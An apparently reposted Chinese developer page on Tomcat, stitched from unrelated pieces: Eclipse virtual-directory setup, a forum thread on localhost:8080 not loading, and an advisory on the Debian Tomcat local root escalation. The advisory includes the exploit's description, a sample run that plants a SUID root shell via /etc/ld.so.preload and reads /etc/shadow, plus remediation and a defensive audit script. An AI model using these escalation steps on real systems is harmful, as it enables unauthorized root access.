Why can't Tomcat shut down properly?

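First, we need to understand the benefit of a virtual directory. A virtual directory differs from the original way of running Tomcat, in which you copy the project into webapps, start Tomcat, and can then access the projects under webapps. When we configure Tomcat through Eclipse, the underlying principle is the same.
The drawback of this approach is that the project under webapps is not the latest state: once we modify the project in the Eclipse workspace, the change is not immediately reflected in tomcat/webapps. So after compiling the project we have to clear the cache under webapps, or even remove the project and put it back in. This back-and-forth greatly reduces productivity: every small change means repeating the whole process.
Smart people are always lazy. We wondered whether the current approach could be replaced by a better one. This is where the virtual directory comes in.
A virtual directory points the web publishing directory directly at the Eclipse workspace, so updates are available as soon as they are made.
To configure a virtual directory, create a file named "project-name.xml" (after the project) under Tomcat/conf/catalina/localhost, with the following content:
<?xml version="1.0" encoding="UTF-8"?>
<Context path="/cecb2b" docBase="E:\workspace\cecb2b\webContent" workDir="E:\workspace\cecb2b\word" reloadable="true" debug="1"></Context>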
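Attribute explanation:
  path: the name used to access the application over the network
  docBase: the actual path of the project
  workDir: the directory where the Java files generated from JSPs are stored. Configuring it this way avoids recompiling the JSPs when the project is moved
  reloadable: whether to reload when class files change
  debug: whether debug mode is enabled
This way the web publishing directory points directly at the project in the Eclipse workspace. When we change code in Eclipse, Tomcat reloads automatically as soon as we build, so we no longer have to keep removing and re-adding the project.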
Finally, we can also modify the following in conf/web.xml:
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
Change false to true.
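Finally, note that a web project created in Eclipse must be a Dynamic Web Project; then change some of the project's properties:
1. Uncheck Project--Build Automatically.
2. Properties--Builders--uncheck everything except Java Builder (this greatly speeds up the project build).
3. Properties--Java Build Path--Source--project-name/WebContent/WEB-INF/classes
Note that Tomcat 7.0 differs from earlier versions:
<Context path="/vsearch" docBase="E:/workspace/vsearch2012/WebContent" reloadable="true" debug="5" crossContext="true" />
Note that the XML file name must be the same as the path name!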
Tomcat local privilege escalation vulnerability alert

Tomcat is a Servlet container developed by the Jakarta project under the Apache Software Foundation. Following the technical specifications provided by Sun Microsystems, it implements support for Servlet and JavaServer Pages (JSP) and provides some features specific to a web server, such as the Tomcat management and control platform, security realm management and Tomcat valves.

On October 1, a local privilege escalation vulnerability in Tomcat was disclosed. Through this vulnerability, an attacker can go from a low-privileged Tomcat user to root on the system.

Vulnerability information:
CVE ID: CVE-
Affected versions:
Tomcat 8 <= 8.0.36-2
Tomcat 7 <= 7.0.70-2
Tomcat 6 <= 6.0.45+dfsg-1~deb8u1
Affected systems include Debian and Ubuntu; other systems that use the corresponding deb packages may also be affected.

Vulnerability description:
On Debian-family Linux systems, administrators usually manage packages with apt-get. The problem behind CVE- lies in the Tomcat deb package: a Tomcat installed from the deb package automatically installs a startup script for the administrator, /etc/init.d/tomcat*. Through this script, an attacker can go from a low-privileged Tomcat user to root on the system!

# Run the catalina.sh script as a daemon
set +e
touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

If a local attacker acting as the tomcat user (for example, through a vulnerability in a web application) replaces catalina.out with a link pointing to an arbitrary system file, the attacker can obtain root privileges once the Tomcat init script (running as root) opens catalina.out again after a service restart.

Vulnerability PoC: the script tomcat-rootprivesc-deb.sh, discovered and coded by Dawid Golunski. Its header describes it as follows:

# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
#
# CVE-
#
# Discovered and coded by:
#
# Dawid Golunski
#
# This exploit targets Tomcat (versions 6, 7 and 8) packaging on
# Debian-based distros including Debian, Ubuntu etc.
# It allows attackers with a tomcat shell (e.g. obtained remotely through a
# vulnerable java webapp, or locally via weak permissions on webapps in the
# Tomcat webroot directories etc.) to escalate their privileges to root.
#
# Usage:
# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]
#
# The exploit can used in two ways:
#
# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly
# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.
# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up
# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)
#
# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to
# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.
# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a
# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can
# then add arbitrary commands to the file which will be executed with root privileges by
# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default
# Ubuntu/Debian Tomcat installations).
#
# See full advisory for details at:
# /advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-.html
#
# Disclaimer:
# For testing purposes only. Do no harm.

Example PoC run:

tomcat7@ubuntu:/tmp$ id
uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)
tomcat7@ubuntu:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat
ii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries
ii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine
ii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files
tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out

Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
CVE-
Discovered and coded by:
Dawid Golunski

[+] Starting the exploit in [active] mode with the following privileges:
uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)
[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out
[+] Compiling the privesc shared library (/tmp/privesclib.c)
[+] Backdoor/low-priv shell installed at:
-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh
[+] Symlink created at:
lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload
[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...
You could speed things up by executing : kill [Tomcat-pid] (as tomcat user))
[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges:
-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload
[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload
[+] The /etc/ld.so.preload file now contains:
/tmp/privesclib.so
[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
[+] Rootshell got assigned root SUID perms at:
-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh
Please tell me you')
[+] Executing the rootshell /tmp/tomcatrootsh now!
tomcatrootsh-4.3# id
uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)
tomcatrootsh-4.3# whoami
root
tomcatrootsh-4.3# head -n3 /etc/shadow
root:$6$oaf[cut]:99:7:::
daemon:*:99:7:::
bin:*:99:7:::
tomcatrootsh-4.3# exit

Emergency remediation:
1. Temporary fix
If updating the package is considered risky, first change the chown line in the Tomcat startup script to:
chown -h $TOMCAT6_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
Adding the -h option prevents the ownership of other files from being changed.
2. Update to the latest Tomcat package
Updating to the latest Tomcat package provided by the system is sufficient.
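A defensive check for the condition described in the advisory, as an added example that is not part of the original article or of the Tomcat packaging: it flags an init script whose chown of catalina.out lacks -h, and a log path that has been replaced by a symbolic link. The function names and the temporary sample files are assumptions made for illustration; on a real host the arguments would be the init script under /etc/init.d and the catalina.out path.

```shell
#!/bin/sh
# Added example (not from the advisory): audit a Tomcat init script and log
# path for the root-chown-through-symlink condition described above.

# Prints "unsafe-chown" when a chown of catalina.out lacks -h, else "ok".
check_init_script() {
    if grep -E '^[[:space:]]*chown[[:space:]]' "$1" | grep 'catalina\.out' |
        grep -Eqv 'chown[[:space:]]+(-[A-Za-z]*h|--no-dereference)'; then
        echo "unsafe-chown"
    else
        echo "ok"
    fi
}

# Prints "symlink:<target>" when the log path is a symbolic link, else "ok".
check_log_path() {
    if [ -L "$1" ]; then
        echo "symlink:$(readlink "$1")"
    else
        echo "ok"
    fi
}

# Combined audit: prints both results, returns 0 only when both are "ok".
audit_tomcat() {
    init_result=$(check_init_script "$1")
    log_result=$(check_log_path "$2")
    echo "init=$init_result log=$log_result"
    [ "$init_result" = "ok" ] && [ "$log_result" = "ok" ]
}

# Constructed sample input: an init script fragment with the unpatched chown,
# its -h variant, and a log path that is a symlink to a harmless temp file.
demo_dir=$(mktemp -d)
cat > "$demo_dir/tomcat7.init" <<'EOF'
touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
EOF
sed 's/chown /chown -h /' "$demo_dir/tomcat7.init" > "$demo_dir/tomcat7.fixed"
: > "$demo_dir/other-file"
ln -s "$demo_dir/other-file" "$demo_dir/catalina.out"
: > "$demo_dir/catalina.plain"

audit_tomcat "$demo_dir/tomcat7.init" "$demo_dir/catalina.out" || true
audit_tomcat "$demo_dir/tomcat7.fixed" "$demo_dir/catalina.plain"
```

A symlinked catalina.out is worth alerting on by itself, because the init script runs as root while the log directory is writable by the tomcat user.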
When reposting, please credit: this article is reposted from the OSChina community (开源中国社区)
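What does this have to do with Java? Didn't you see that it's a Linux symlink?
This isn't the fault of Tomcat or Java; blame Debian's packaging.

Why does Tomcat start normally in Eclipse, but the browser cannot open the Tomcat home page?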
Tomcat in Eclipse starts without reporting any errors. The startup output is as follows:
12:07:39 org.apache.catalina.core.AprLifecycleListener init 信息: The APR based Apache Tomcat Native library which allows optimal performance in production environments was not found on the java.library.path: C:\Program Files\Java\jdk1.6.0_02\.;C:\Windows\Sun\Java\C:\Windows\system32;C:\WC:/Program Files/Java/jre6/bin/C:/Program Files/Java/jre6/C:/Program Files/Java/jre6/lib/i386;D:\Python27\;D:\Python27\SC:\Windows\system32;C:\WC:\Windows\System32\WC:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft SQL Server\100\Tools\Binn\;C:\Program Files\Microsoft SQL Server\100\DTS\Binn\;C:\Program Files\Microsoft SQL Server\100\Tools\Binn\VSShell\Common7\IDE\;D:\MatLab\bin\win32;C:\Windows\Microsoft.NET\Framework\v4.0.30319;C:\Program Files\Java\jdk1.6.0_02\D:\Program Files\TortoiseSVN\D:\Program Files\MySQL\MySQL Server 5.5\C:\Program Files\Java\jdk1.6.0_02\F:\maven\apache-maven-3.0.4-bin\apache-maven-3.0.4\C:\Program Files\Java\jdk1.6.0_02\D:\Program Files\elipse企业版\eclipse-jee\
12:07:41 org.apache.coyote.AbstractProtocol init 信息: Initializing ProtocolHandler ["http-bio-8080"]
12:07:42 org.apache.coyote.AbstractProtocol init 信息: Initializing ProtocolHandler ["ajp-bio-8009"]
12:07:42 org.apache.catalina.startup.Catalina load 信息: Initialization processed in 4391 ms
12:07:42 org.apache.catalina.core.StandardService startInternal 信息: Starting service Catalina
12:07:42 org.apache.catalina.core.StandardEngine startInternal 信息: Starting Servlet Engine: Apache Tomcat/7.0.29
12:07:43 org.apache.catalina.util.SessionIdGenerator createSecureRandom 信息: Creation of SecureRandom instance for session ID generation using [SHA1PRNG] took [488] milliseconds.
12:07:43 org.apache.coyote.AbstractProtocol start 信息: Starting ProtocolHandler ["http-bio-8080"]
12:07:43 org.apache.coyote.AbstractProtocol start 信息: Starting ProtocolHandler ["ajp-bio-8009"]
12:07:43 org.apache.catalina.startup.Catalina start 信息: Server startup in 1659 ms
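But I can't reach localhost:8080, and I don't know why. Hoping an expert can answer.
Are you sure it's port 8080?
--- 1 comment in total ---
Check whether Tomcat has a webapps/ROOT folder.
By default, Tomcat's "/" points to the ROOT application.
You haven't changed the port, or done anything else?
Quoting the answer from "jeffsui": Are you sure it's port 8080? Yes, it's 8080.
信息: Initializing ProtocolHandler ["http-bio-8080"]
Quoting the answer from "xwz": Check whether Tomcat has a webapps/ROOT folder.
By default, Tomcat's "/" points to the ROOT application. That's the right answer. Most likely the folder was deleted by mistake.
--- 1 comment in total ---
Yes, I've run into this situation before, but my Tomcat was freshly downloaded and then newly set up in Eclipse.
Thanks everyone, the problem is solved. The problem was that I had not set the Tomcat server location in Eclipse to the Tomcat installation directory.
That was indeed the problem, thanks to the original poster.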